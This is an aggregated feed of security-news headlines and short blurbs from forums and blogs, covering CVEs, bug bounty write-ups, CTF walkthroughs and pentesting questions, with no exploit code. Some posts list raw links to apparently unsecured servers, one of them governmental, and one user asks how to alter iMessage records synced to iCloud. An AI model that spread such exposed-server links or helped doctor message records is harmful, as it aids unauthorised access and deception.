    GUARDARA, a software quality assurance platform to identify bugs and zero-day vulnerabilities at scale, is now free for individual security researchers and non-commercial open-source projects.
    submitted by /u/JohnKeymanUK [link] [comments]  ( 1 min )
    Software Defined Radio, Part 6: Building a Cellphone IMSI Catcher (Stingray)
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CVE-2022-24348 Argo CD Vulnerability and its impact on Kubernetes
    submitted by /u/rippatpop [link] [comments]  ( 1 min )
  • Open

    A Curious Glitch in XSS Sanitizing
    When looking for ways to bypass XSS sanitizing (sanitizing, not filtering), I’ve figured out something interesting but almost useless… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SysInternals — The Other Way Around
    We all have been sometime, someday in our professional life have used SysInternals Suite. I personally have used these utilities… Continue reading on Medium »  ( 2 min )
    Attack Simulation (Why it is Important!) Part 2 — Get one’s ducks in a row
    Now, following steps through part 1, we have lab setup and running. It is essential to understand how things are working in the background… Continue reading on Medium »  ( 4 min )
  • Open

    FreeBuf早报 | 美国起诉多个”诈骗“呼叫中心;一名美国黑客对朝鲜网络发动攻击
    因遭到勒索软件的攻击,位于荷兰阿姆斯特丹和鹿特丹、比利时安特卫普的几处港口的石油装卸和转运受阻。  ( 1 min )
  • Open

    Shuckworm Continues Cyber-Espionage Attacks Against Ukraine
    submitted by /u/dmchell [link] [comments]

  • Open

    Is it possible to change the messages that are saved to iCloud
    Recently I’m dealing with a situation in which someone has edited the contents of a conversation in iMessages. I figured out how dates could be changed but now I want to know if it’s possible to make what’s saved to iCloud reflect what’s been created. submitted by /u/JasonTheTodd [link] [comments]  ( 1 min )
    How to proceed in the following hypothetical security breach scenario
    Hey, I was met with the following hypothetical scenario during school exam, to which my answer was insufficient. I'd love to hear your takes on it if you don't mind. "Bank's backup data were left unsecured on a public server. Propose a solution to protect data from being misused when this happens again." Thank you. submitted by /u/Ok-Cow-3198 [link] [comments]  ( 2 min )
    A webserver on my home computer
    I am trying to run a webserver on my computer that can be reached from the Internet. From what I understood, I would need to configure my router to allow the incoming http trafic to be forwarded to the webserver. However, for this to work, i would need to have a fixed public address, which is not the case for me.Is there a workaround to make this work without having to fix the IP on the ISP side? submitted by /u/spectnullbyte [link] [comments]  ( 3 min )
    "Technical skills" on a resume?
    I imagine I need something better than just listing the tools I can use. But then again I don't want something as generic as "DNS enumeration" or "Vulnerability Assessment". I've got decent work experience but I'm lacking trying to think of what I can put in the technical skills part that is useful but not bullshittery. submitted by /u/thehunter699 [link] [comments]  ( 1 min )
    Questions about Active Directory pentesting
    Hey everyone! I just started to look into AD stuff and I have a few questions. I hope this is the right subreddit for AD related questions. If not, please direct me to the appropriate one. Questions: If I use LLMNR or IPv6 DNS Poisoning and get the NTLM hash of a local admin, I can use that hash or the cracked password to access the machine he's an admin on. If I manage to fetch the hash of a domain admin, I can log into any machine on the domain including the domain controller. What can I do if I get hash of a lowly domain user? I cannot log into any machine. Can I still authenticate against the DC to get infos like users, policies, etc? Does it make a difference if I only have the hash or the cracked password? If we are only a regular domain user all we can do to escalate our privileges is kerberoasting, correct? Like, we can't do pass the hash / pass the password because we can't get any from a machine. And we can't do token impersonation because, again, we can't get onto any machine. I want to thank everyone in advance for answering any of these questions. Please correct me if I misunderstood anything. I'm really new to AD pentesting. submitted by /u/placeholderbagholder [link] [comments]  ( 3 min )
    When using Public WiFi.. is a VPN essential or should you just ensure you're using HTTPS?
    Hi all, Going travelling around the world and will likely rely on Public WiFi Hotspots. Do I definitely need a VPN or just ensure I'm connecting to sites with HTTPS? Whatabout if I use celluar instead..? Do I need a VPN then? Please let me know your thoughts. Burge x submitted by /u/MyNamesBurge [link] [comments]  ( 3 min )
  • Open

    Firefox JIT Use-After-Frees – Exploiting CVE-2020-26950
    Article URL: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/ Comments URL: https://news.ycombinator.com/item?id=30225843 Points: 1 # Comments: 0  ( 23 min )
  • Open

    Shodan: Find Any Device Connected To The Internet
    IoT Devices Search Engine Continue reading on Medium »  ( 1 min )
    How to “build” an Information Security Industry at Home?
    Check out the following personal photos courtesy of Dancho Danchev which describe his experience in the information security industry. Continue reading on Medium »  ( 2 min )
    The UK “Freedom Convoy”
    I’ve been extremely tangentially following the Freedom Convoy activity as part of wider opposition-monitoring efforts, including… Continue reading on Medium »
    FIND THE CAMERA [KNIGHT-CTF]
    as it was mention needed to find the camera model number, exif this image but found nothing. again after reviewing the image get to know… Continue reading on Medium »  ( 1 min )
  • Open

    Resolviendo Daily Bugle de TryHackMe Pt1
    Muy buenos días, tarde o noches estimados lectores, el día de hoy les traigo mi primer publicación en Medium, la resolución del room de… Continue reading on Medium »  ( 2 min )
    [RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator
    Some notes on setting up both LLVM obfuscator and SysWhisper2 in Visual Studio 2019. Continue reading on Medium »  ( 2 min )
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Does a master’s in cybersecurity and digital forensics require an engineering maths background or is Bachelors in IT with topics like Basic maths, discrete structure and Numerical methods enough?
    what i know from my research is that different universities have different criteria like Calculus I and II but a basic undergrad IT course may not contain multiple maths topic like Computer science or engineering course does. So will bachelors in Information technology be enough to later apply as international student in different countries for Msc cyber forensics submitted by /u/axyut [link] [comments]  ( 2 min )
  • Open

    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)… Continue reading on InfoSec Write-ups »  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access — Indonesia
    Untuk mengetahui basic dari SSRF bisa membaca Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability — Indonesia Continue reading on Medium »  ( 2 min )
    All About the CSRF vulnerability
    This Blog is all about the CSRF Vulnerabilities and Lot more BOOM !!!!!!!!!! Continue reading on Medium »  ( 4 min )
    What I’ve learned from hunting bugs for 2 months?
    Bug bounty hunting, a glamourous life of 100k bounties followed by Lamborghini pics on social media. If you are alive and in the part of… Continue reading on Medium »  ( 3 min )
    IDOR with Autorize!
    Here is my write-up, I’m gonna tell you about my recent finding and my first IDOR(Insecure direct object references). Continue reading on Medium »  ( 2 min )
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    oniongrok: Onion addresses for anything.
    submitted by /u/oniongrok [link] [comments]  ( 1 min )
    Testing Infrastructure-as-Code Using Dynamic Tooling
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CISSP Domain 1 - Episode 4 - Business Case, Types of Project Plans, Organizational Process, Change Management and Data Classification by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-05 Review
    对Java反序列化数据绕WAF新姿势的补充 by ourren 连载:演化的高级威胁治理(五) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Vulnerability Disclosure Programs Done the Right Way
    Article URL: https://www.lutasecurity.com/post/vulnerability-disclosure-programs-done-the-right-way Comments URL: https://news.ycombinator.com/item?id=30221511 Points: 2 # Comments: 0  ( 3 min )
  • Open

    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    beer labels, sorted by country.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    interior design/architecture photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    O_D Movies/
    https://203.51.37.9:9802/Movies/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]

  • Open

    Philippine Department of the Interior -=-=[ O_D ]=-=-
    http://www.downloads.region10.dilg.gov.ph/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Hazardous material compliance reports
    http://13.113.60.173:81/output/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Jackpot
    http://dhakaftp.com/Data/ Lots of movies. Really good Download speeds. look for "English movies" or "Hollywood" in folders for movies in English. Try to take it easy as to not overwhelm the site. submitted by /u/soulkrypto [link] [comments]
    Nobel OD server in Romania
    submitted by /u/stereoroid [link] [comments]  ( 1 min )
  • Open

    DD-WRT Post Attack Forensics
    Hello all, I recently discovered my router running DD-WRT has been hacked. What I mean by that is, I got an email from ISP about abuse which indicated my IP has been brute forcing ssh. I went to investigate and noticed my DD-WRT WebGUI is disabled and that my ESXI lab (which had default creds since it was a small lab and not exposed to internet) had been tampered with. I have removed power from the infected router and gotten back online with a cheap walmart backup, but I want to investigate this and get my infected router back online safely without losing evidence. Any DD-WRT advice would be appreciated as to how I should start my analysis. Thanks submitted by /u/the_grey_philosopher [link] [comments]  ( 2 min )
  • Open

    Why are so many ports open on Xiaomi router?
    https://imgur.com/a/zSorMtG submitted by /u/Tqis [link] [comments]  ( 1 min )
    Port Ranges Set to DENY in UFW (Firewall) are Still Allowing Traffic on Those Ports
    Hey all, Here is a screen grab of ‘grep “Failed password” /var/log/auth.log’ for reference: https://imgur.com/a/G2bwrZO I have the port range 30999:59999 set to DENY IN from ANYWHERE for udp and tcp traffic, yet I’m still receiving login attempts within the ranges of blocked ports. Can anybody spot a misconfiguration, or perhaps explain what I’m missing with UFW? submitted by /u/OffishalFish [link] [comments]  ( 1 min )
    Hardening guides primarily for Microsoft products
    Hi everyone, I remember that the NSA used to make the de facto hardening guide for Windows/AD environments. However, I can only find one relating to Windows Server 2000. Are there any modern versions of that relating to the Microsoft/Azure/AD environments from another trusted instance, not some company trying to sell a product? Thank you for all your support. submitted by /u/Adrixan [link] [comments]  ( 1 min )
    Need help understanding XXE Injection
    So, I was practicing XXE labs on portswigger web sec academy and I came across a DTD payload with the characters "%" in the nested entities. I tried to find if there is a syntax specification for this in xml but found nothing regarding it, all I found by googling this are just some more xml payloads. So, anybody have any idea what these characters exactly are and what they do? I am thinking like these are only used in nested entity definitions, is that correct? I am totally confused. Any help would be greatly appreciated. ​ PS: I am a complete newbie. So, if this is a stupid question forgive me! submitted by /u/DeadTree_22 [link] [comments]  ( 1 min )
    Fml it’s pronounced demon!
    I did not know that daemon is pronounced demon. Maybe someone else will see this and learn too. submitted by /u/lowkiwatchingyou [link] [comments]  ( 2 min )
    Do I need to be good at programming (C to be more specific) in order to get ahead in my CyberSecurity field?
    The moment I opt in my college first year (1st sem), The college gave us the syllabus of C, I'm pretty bad at it cuz C isn't something that I had dealt firsthand in the last year and tbh I'm a python kinda guy I only worked with python so C isn't a area of my interest. So my question is that Do I need to be too good at C is it gonna be relevant somehow later in hacking field? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Edge Filelinks
    In newer versions of edge filelinks (e.g. to a unc path) are blocked by default. Are there any security issues allowing filelinks for secure intranet zones? It can be activated via policy https://docs.microsoft.com/en-us/deployedge/microsoft-edge-policies Thanks! submitted by /u/montyspinneratz [link] [comments]
    Best WiFi card for penetration testing, passive mode, injection?
    I understand that my terminology might be a bit out of date. It's been a while, I know to research on my own. I want to know, though, what the best advice on here is for cracking 802.11 networks, and such things., Last i checked it was the ALFA AWUS 036 N card, I have one, and then they released the 802.11n version. What is the gold standard these days? The best I can tell, is actually nothing - with a strong password, WPA-2, modern encryption... What are we dealing with these days? I still have my ALFA card and several other 802.11n card that can inject packets. Just feel like there has been a lot of fragmentation over the last decade and really, any opinions on whether or not the whole "WiFi hacking" gig is dead, well, I want your thoughts. submitted by /u/ValerieVexen [link] [comments]  ( 1 min )
  • Open

    Apiiro team uncovers 0-day vulnerability in Argo CD
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30212283 Points: 1 # Comments: 0  ( 6 min )
    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
  • Open

    Linux | Madaidan's Insecurities
    submitted by /u/Nhamatanda [link] [comments]
    Rooting Gryphon Routers via Shared VPN : 🎵 This LAN is your LAN, this LAN is my LAN 🎵
    submitted by /u/stargravy [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Nooie baby monitor
    submitted by /u/jaymzu [link] [comments]
    Silly proof of concept: Anti-phishing using perceptual hashing algorithms
    submitted by /u/anvilventures [link] [comments]  ( 2 min )
    Compromising out-of-bound secrets on Argo CD platform utilizing a malicious Kubernetes Helm Chart (CVE-2022-24348)
    submitted by /u/dalmoz [link] [comments]
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Reflected XSS and Blind out of band command injection at subdomain dstuid-ww.dst.ibm.com
    IBM disclosed a bug submitted by smokin-ac3z: https://hackerone.com/reports/410334
    'net/http': HTTP Header Injection in the set_content_type method
    Ruby disclosed a bug submitted by chinarulezzz: https://hackerone.com/reports/1168205
  • Open

    100 Days of Hacking — DAY 1
    Let’s see how it goes Continue reading on Medium »  ( 2 min )
    Threat Modelling
    Few words on Threat Modelling. Continue reading on Medium »
    Easy Understanding of Owasp Top 10-2021
    What is owasp ? Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - BUSINESS LOGIC VULNERABILITIES LAB ÇÖZÜMLERİ
    Business Logic (İş Mantığı) zafiyeti, bir web uygulamasının tasarımında ve uygulamasında, saldırganın istenmeyen davranışlar sergilemesine… Continue reading on Medium »  ( 15 min )
  • Open

    SecWiki News 2022-02-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    Quiztime — Random OSINT Challenge 11
    On Jan 23, 2022, Quiztime (contributor @SEINT_pl) shared a new OSINT quiz with us. Continue reading on Medium »  ( 2 min )
    How to Track Down Cyber Threat Actors and FBI’s Most Wanted Cybercriminals Using OSINT and Maltego?
    Do you want to become famous? Did you know that an OSINT conducted today is a tax payer’s buck saved somewhere? Keep reading. Continue reading on Medium »  ( 8 min )
  • Open

    冬训营丨高级威胁活动中C2的多样风格
    C2作为名词来讲,是指APT组织掌握的基础设施,也就是IP、域名、URL。  ( 1 min )
  • Open

    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
    Hostapd/wpa_supplicant: new release v2.10 (with CVE fixes)
    Article URL: https://lists.infradead.org/pipermail/hostap/2022-January/040148.html Comments URL: https://news.ycombinator.com/item?id=30200900 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )

  • Open

    Reload4j 1.2.18.5: A drop-in replacement for Log4j 1.2.17 and CVE fixes
    Article URL: https://reload4j.qos.ch/news.html Comments URL: https://news.ycombinator.com/item?id=30200504 Points: 2 # Comments: 0  ( 1 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is considered more secure VPN client software on IoT device or IoT device behind VPN?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Passive log analysis software
    Hello, I am interested if there is tool/software that will help me analyze logs from web server, ssh and Mysql for intrusion, but on another PC. So I basically want to pull logs from many servers and run them trough some software that can detect possible SQLi or path traversal attempts, something like that. I know there is Snort and SIEMs but is there any software that will use for example Snorts engine and rules to do this analysis offline ? Or can I run snort on some log file from other server? P.S. possibly open source. Thanks. submitted by /u/P-e-t-a-r [link] [comments]  ( 5 min )
    OneNote Visibility
    Hi Guys. I like OneNote, and my org blocks anything else, I use it at work and at home. Three questions: If I login to my work OneNote account, on my personal Mac/Win/Linux computers, can my work track my computers at all, or see it's MAC address or name? If I login to my personal OneNote account on my work computer, can they read my OneNotes? Do the answers to the above two questions apply for all of OneDrive too? Appreciate any responses as I've been told that it's all pretty private so I should be good to go with either. submitted by /u/bloqs [link] [comments]  ( 3 min )
  • Open

    Index of NASA's Land Processes Distributed Active Archive Center
    https://e4ftl01.cr.usgs.gov/ASTT/ ​ Some sort of unsecured government website. submitted by /u/Main_Force_Patrol [link] [comments]
    Indexes from Bronless.Grotto.Faith
    https://bornless.grotto.faith/pages/ https://bornless.grotto.faith/images/ submitted by /u/EmuAnon34 [link] [comments]
    Mozart Opera Omnia in FLAC format (200 CDs)
    http://rmeyer.comelitdns.com/Music/MOZART%20225/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    Doom 2 WADS
    submitted by /u/millhouse187 [link] [comments]  ( 1 min )
    Lots of movies and TV. Slow connection.
    submitted by /u/josephalbright1 [link] [comments]
    I need a search engine for stat.ameba.jp
    Several blogs from some J-Pop groups were deleted but the photos remain on ameba's servers. I have found a few (https://stat.ameba.jp/user_images/82/56/10138975701.jpg) but would like to search images I have in low quality on this site. submitted by /u/Alarod [link] [comments]
  • Open

    Beethoven X Joins Balancer Labs’ Bug Bounty Program
    In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of… Continue reading on Balancer Protocol »  ( 2 min )
    [Bugbounty]SSRF — IFRAME INJECTION E XSS REFLECTED
    Hoje vou falar um pouco de uma falha que me levou a dois relatórios infelizmente ambos foram duplicados porém ficou de experiência e… Continue reading on Medium »  ( 2 min )
    Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
    At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking… Continue reading on Immunefi »  ( 3 min )
    UnderRated Tool For Pass-The-Hash[Evil-WinRM]
    First Of all I’ll Describe What is Pass-The-Hash Attack Continue reading on Medium »  ( 1 min )
  • Open

    A detailed analysis of Lazarus malware disguised as Notepad++ Shell Extension
    submitted by /u/CyberMasterV [link] [comments]
    NTLM Relaying - A comprehensive guide
    submitted by /u/jeanc0re [link] [comments]  ( 1 min )
    [CVE-2022-23602] Don't trust comments
    submitted by /u/crower [link] [comments]  ( 1 min )
    History of REvil: detailed report on the rise and fall of a Russian crime gang.
    submitted by /u/Jazzlike-Resource500 [link] [comments]
  • Open

    Interview questions for entry level incident response positions?
    i have an interview coming up soon. What sort of technical questions /scenario questions should I be expecting? Thx submitted by /u/tfulab23 [link] [comments]  ( 2 min )
    Photorec Issues
    I am new to computer forensics and am having trouble installing autopsy to my Mac. When I am installing autopsy, I get an error when checking the prerequisites for autopsy. Specifically, when I type "sh unix_setup.sh" into terminal, it reads "ERROR: PhotoRec not found, please install the testdisk package." I have installed testdisk so I am just confused why I get this error. Sorry if this is a stupid question, I am just dumbfounded by this error message. submitted by /u/Vekayy [link] [comments]  ( 1 min )
  • Open

    Remote Code Execution on .8x8.com via .NET VSTATE Deserialization
    8x8 disclosed a bug submitted by 0daystolive: https://hackerone.com/reports/1391576
    text injection and content spoofing
    OneWeb disclosed a bug submitted by aman420: https://hackerone.com/reports/1353200
    Reflected Xss in https://world.engelvoelkers.com/...
    Engel & Völkers Technology GmbH disclosed a bug submitted by pl4gue_shell: https://hackerone.com/reports/1401209
    Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1464396 - Bounty: $2000
  • Open

    SecWiki News 2022-02-03 Review
    新姿势绕过应用的ROOT检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Tuning in the Hot Spots
    A few months ago, I posted an instructional video on using internet radio servers to tune and listen to AM radio stations in Ukraine and… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 10
    On Jan 20, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was, interesting. We had to figure out… Continue reading on Medium »  ( 2 min )
    Open-source Intelligence. With OSINT Course Giveaway !!
    Open-source Intelligence: Premimum Hacking Course In Free !! Continue reading on Medium »  ( 2 min )
  • Open

    SnapFuzz: New fuzzing tool speeds up testing of network applications
    Article URL: https://portswigger.net/daily-swig/snapfuzz-new-fuzzing-tool-speeds-up-testing-of-network-applications Comments URL: https://news.ycombinator.com/item?id=30191854 Points: 17 # Comments: 2  ( 4 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is Red Teaming?
    This blog post was published on PurpleBox website on Feb 2nd, 2022. Continue reading on PurpleBox »  ( 6 min )

  • Open

    Debian has not fixed CVE-2021-44142
    Article URL: https://security-tracker.debian.org/tracker/CVE-2021-44142 Comments URL: https://news.ycombinator.com/item?id=30183811 Points: 2 # Comments: 1
  • Open

    Entry-level Penetration Tester salary in Switzerland?
    What would be an approximate salary range for a penetration tester in Switzerland (Zürich area as a reference)? Not necessary big 4 but also small or medium size companies, for an entry level position, with a master's degree, and a 6-month internship in the field as the only experience. submitted by /u/BroX111 [link] [comments]  ( 1 min )
    How would you fix today's computer security problems?
    UPDATE: My original question was too broad. Please choose which significant problem you might solve based on your expertise. No silver bullet to solve all security problems is necessary. Thanks for your constructive criticism! How would you fix today's computer security problems if you could start any hardware or software company, or create any technology related standard. It could be anything, maybe new hardware and software working together that fixes a major problem like hacking or malware. I don't want to put anyone in a creative box so I'll share my idea later today. Please don't read any results until you have thought of something. Update: How would you protect as many people as possible when you run control a company like Google, Microsoft, Intel, etc., or can pass new laws or create new tech standards. submitted by /u/greyyit [link] [comments]  ( 5 min )
    EDR / XDR on premise
    Hi Anyone knows of useful edr products which could be operated on premise, without using cloud services? Could also just be a so called next gen av at least? Maybe you could even share some experience? All products I know are cloud based and report too much to the cloud (e.g. file paths, user information etc). I've read of Cyberason once, but the link to the on PREM offer is invalid... Bitdefender advertises an edr on prem, but I only know them from a consumer perspective. Thanks! submitted by /u/winschdi [link] [comments]  ( 2 min )
    Scanning for locations.
    Hello, Any tips on scanning slower with gobuster or other tool for finding paths and evade WAF. I'm afraid it will be detected and probably my machine will be blocked by it. submitted by /u/tryingtoworkatm [link] [comments]  ( 1 min )
    How Are Hackers Caught
    If tools like proxies are available to hackers, how are they caught? submitted by /u/Odd_Rip6706 [link] [comments]  ( 4 min )
    Advice deciding between 2 cybersecurity offers at the Big4
    Hey guys, I recently received cybersecurity consultant offers from both KPMG and EY. While I do have a lot of info about each firm based on my interviews and offer letters, I was wondering if there were any former/current employees or anybody here who has worked with these two firms, and if they could share about their experiences? Compensation-wise, EY's is higher. They're both in the same city on the West Coast. Thanks! submitted by /u/bongotw [link] [comments]  ( 2 min )
    Question regarding CTI even that can lead to an incident
    Hi user, I have a question regarding threat intelligence and "incident" response. Let's take an example: I work for Company A. I notice that an access broker sell access to Company B. Company A and Company B work together and have some network connexion to exchange data. In this case, we can suppose that company B will increase our threat risk due to possible lateral movement, but as the threat actor "only" sell an access, we can't determine what kind of threat we will facing. On the business side this will be hard for them to understand that it's a potential threat and we should execute a containment phase by cutting connexion with company B. And for the detection team, we don't have enough info on what kind of threat they should monitor. In your opinion, what should i do ? submitted by /u/octave_ [link] [comments]  ( 2 min )
  • Open

    Using Power Automate for Covert Data Exfiltration in Microsoft 365
    submitted by /u/rsobers [link] [comments]
    Hacking Google Drive Integrations
    submitted by /u/albinowax [link] [comments]
  • Open

    The evolution of a Mac trojan: UpdateAgent’s progression
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 06
    As I’m having so much fun doing the Hacktoria’s geolocation challenges, I have decided to just keep solving them and writing walkthroughs… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 8
    On Jan 16, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was simple but cool. We had to figure out… Continue reading on Medium »  ( 3 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Serious Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/serious-vulnerability-in-wordpress-plugin-essential-addons-for-elementor-eliminated Comments URL: https://news.ycombinator.com/item?id=30179610 Points: 2 # Comments: 1  ( 3 min )
    Critical Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/critical-vulnerability-in-wordpress-plugin-essential-addons-for-elementor Comments URL: https://news.ycombinator.com/item?id=30179238 Points: 1 # Comments: 0  ( 3 min )
    Fastly patches memory leak HTTP/3 vulnerability in H2O HTTP server project
    Article URL: https://portswigger.net/daily-swig/fastly-patches-memory-leak-http-3-vulnerability-in-h2o-http-server-project Comments URL: https://news.ycombinator.com/item?id=30177816 Points: 3 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-02-02 Review
    安全学术圈2021年度总结 by ourren 2021 年终总结:记我在清华 Apache IoTDB 组的成长 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )
  • Open

    Notional Double Counting Free Collateral Bugfix Review
    Summary Continue reading on Immunefi »  ( 5 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
    How To Spice Up Your Programming Journey With 5 Hacks.
    If you are a beginning programmer like me as much as you love programming, there will be times when you feel down. This is not you been… Continue reading on Medium »  ( 2 min )
  • Open

    Утилитарные компоненты и входное значение sx Material-UI
    Утилитарный компонент Box визуализируется как элемент div и предоставляет возможность применять синтаксис краткой формы записи стилей CSS… Continue reading on Medium »  ( 1 min )
    My first bounty, IDOR + Self XSS [€3000]
